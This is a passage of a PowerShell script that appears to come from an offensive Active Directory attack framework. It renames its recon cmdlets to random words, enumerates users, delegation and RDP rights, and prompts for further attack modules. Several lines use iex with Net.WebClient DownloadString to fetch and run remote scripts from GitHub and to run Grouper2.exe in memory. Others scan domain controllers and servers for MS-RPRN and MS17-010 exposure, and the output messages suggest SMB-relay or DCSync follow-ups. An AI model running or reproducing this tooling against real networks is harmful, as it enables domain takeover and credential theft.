prostituted -LDAPFilter "(pwdlastset<=$Date)" -Properties samaccountname,pwdlastset >> "$currentPath\DomainRecon\Users_Nochangedpassword.txt"
# The next two calls query enabled users in two different ways and append both results to the same file.
prostituted -LDAPFilter "(!userAccountControl:1.2.840.113556.1.4.803:=2)" -Properties distinguishedname >> "$currentPath\DomainRecon\Enabled_Users.txt"
prostituted -UACFilter NOT_ACCOUNTDISABLE -Properties distinguishedname >> "$currentPath\DomainRecon\Enabled_Users.txt"
Write-Host -ForegroundColor Yellow 'Searching for Unconstrained delegation Systems and Users'
# The redirection consumes the pipeline output, so $Computers and $Users stay empty; neither is read afterwards.
$Computers = breviaries -Unconstrained >> "$currentPath\DomainRecon\Unconstrained_Systems.txt"
$Users = prostituted -AllowDelegation -AdminCount >> "$currentPath\DomainRecon\AllowDelegationUsers.txt"
Write-Host -ForegroundColor Yellow 'Identify kerberos and password policy..'
$DomainPolicy = forsakes -Policy Domain
$DomainPolicy.KerberosPolicy >> "$currentPath\DomainRecon\Kerberospolicy.txt"
$DomainPolicy.SystemAccess >> "$currentPath\DomainRecon\Passwordpolicy.txt"
Write-Host -ForegroundColor Yellow 'Searching for Systems we have RDP access to..'
rewires -LocalGroup RDP -Identity >> "$currentPath\DomainRecon\RDPAccess_Systems.txt"
$session = Read-Host -Prompt 'Do you want to search for potential sensitive domain share files - can take a while? (yes/no)'
if ($session -eq "yes" -or $session -eq "y" -or $session -eq "Yes" -or $session -eq "Y")
{
mangers >> "$currentPath\DomainRecon\InterestingDomainshares.txt"
}
$aclight = Read-Host -Prompt 'Starting ACLAnalysis for Shadow Admin detection? (yes/no)'
if ($aclight -eq "yes" -or $aclight -eq "y" -or $aclight -eq "Yes" -or $aclight -eq "Y")
{
Write-Host -ForegroundColor Yellow 'Starting ACLAnalysis for Shadow Admin detection:'
# Runs in a separate powershell process: fetches ACLight2 over HTTPS, runs Start-ACLsAnalysis, then moves
# C:\Results\ into .\DomainRecon\ relative to that new process's working directory.
invoke-expression 'cmd /c start powershell -Command {$Wcl = new-object System.Net.WebClient;$Wcl.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;IEX(New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/SecureThisShit/ACLight/master/ACLight2/ACLight2.ps1'');Start-ACLsAnalysis;Write-Host -ForegroundColor Yellow ''Moving Files:'';mv C:\Results\ .\DomainRecon\;}'
}
$powersql = Read-Host -Prompt 'Start PowerUpSQL Checks? (yes/no)'
if ($powersql -eq "yes" -or $powersql -eq "y" -or $powersql -eq "Yes" -or $powersql -eq "Y")
{
powerSQL
}
$spoolscan = Read-Host -Prompt 'Start MS-RPRN RPC Service Scan? (yes/no)'
if ($spoolscan -eq "yes" -or $spoolscan -eq "y" -or $spoolscan -eq "Yes" -or $spoolscan -eq "Y")
{
Write-Host -ForegroundColor Yellow 'Checking Domain Controllers for MS-RPRN RPC-Service! If its available, you can nearly do DCSync.' #https://www.slideshare.net/harmj0y/derbycon-the-unintended-risks-of-trusting-active-directory
iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/SpoolerScanner/master/SpoolerScan.ps1')
$domcontrols = terracing
# Iterates the IPAddress property of whatever terracing returned (presumably the domain controllers).
foreach ($domc in $domcontrols.IPAddress)
{
try{
if (spoolscan -target $domc)
{
Write-Host -ForegroundColor Yellow 'Found vulnerable DC. You can take the DC-Hash for SMB-Relay attacks now'
echo "$domc" >> "$currentPath\Vulnerabilities\MS-RPNVulnerableDC.txt"
}
}catch{Write-Host "Got an error"}
}
$othersystems = Read-Host -Prompt 'Start MS-RPRN RPC Service Scan for other active Windows Servers in the domain? (yes/no)'
if ($othersystems -eq "yes" -or $othersystems -eq "y" -or $othersystems -eq "Yes" -or $othersystems -eq "Y")
{
Write-Host -ForegroundColor Yellow 'Searching for active Servers in the domain, this can take a while depending on the domain size'
$ActiveServers = breviaries -Ping -OperatingSystem "Windows Server*"
foreach ($acserver in $ActiveServers.dnshostname)
{
try{
if (spoolscan -target $acserver)
{
# Single-quoted string: $acserver is printed literally rather than expanded; the hostname itself is only in the file written below.
Write-Host -ForegroundColor Yellow 'Found vulnerable Server - $acserver. You can take the DC-Hash for SMB-Relay attacks now'
echo "$acserver" >> "$currentPath\Vulnerabilities\MS-RPNVulnerableServers.txt"
}
}catch{Write-Host "Got an error"}
}
}
}
$ms1710 = Read-Host -Prompt 'Search for MS17-10 vulnerable Windows Servers in the domain? (yes/no)'
if ($ms1710 -eq "yes" -or $ms1710 -eq "y" -or $ms1710 -eq "Yes" -or $ms1710 -eq "Y")
{
# Function with a hyphenated name defined elsewhere in this file.
MS17-10
}
$domainsharepass = Read-Host -Prompt 'Check Domain Network-Shares for cleartext passwords using passhunt.exe? (yes/no)'
if ($domainsharepass -eq "yes" -or $domainsharepass -eq "y" -or $domainsharepass -eq "Yes" -or $domainsharepass -eq "Y")
{
passhunt -domain $true
}
$gpos = Read-Host -Prompt 'Check domain Group policies for common misconfigurations using Grouper2? (yes/no)'
if ($gpos -eq "yes" -or $gpos -eq "y" -or $gpos -eq "Yes" -or $gpos -eq "Y")
{
GPOAudit
}
}
function GPOAudit
{
<#
.DESCRIPTION
Check Group Policies for common misconfigurations using Grouper2.
Author: @securethisshit
License: BSD 3-Clause
.NOTES
Takes no parameters. Output is written as HTML to "$currentPath\DomainRecon\GPOAudit.html".
Invoke-Sharpcradle is fetched over HTTPS and executed in memory with IEX; it is then pointed at
the Grouper2.exe raw GitHub URL. Neither download is integrity-checked.
#>
#Domain Recon
# Same ordering as domainreconmodules ($currentPath captured before pathcheck); confirm pathcheck does not change the working directory.
$currentPath = (Get-Item -Path ".\" -Verbose).FullName
pathcheck
iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/Invoke-Sharpcradle/master/Invoke-Sharpcradle.ps1')
# "-f" and the output path are passed through as two separate arguments; what Invoke-Sharpcradle does with
# the fetched binary is defined in the script loaded above — confirm there.
Invoke-Sharpcradle -uri https://github.com/SecureThisShit/Creds/blob/master/Ghostpack/Grouper2.exe?raw=true -argument1 "-f" -argument2 "$currentPath\DomainRecon\GPOAudit.html"
}
function reconAD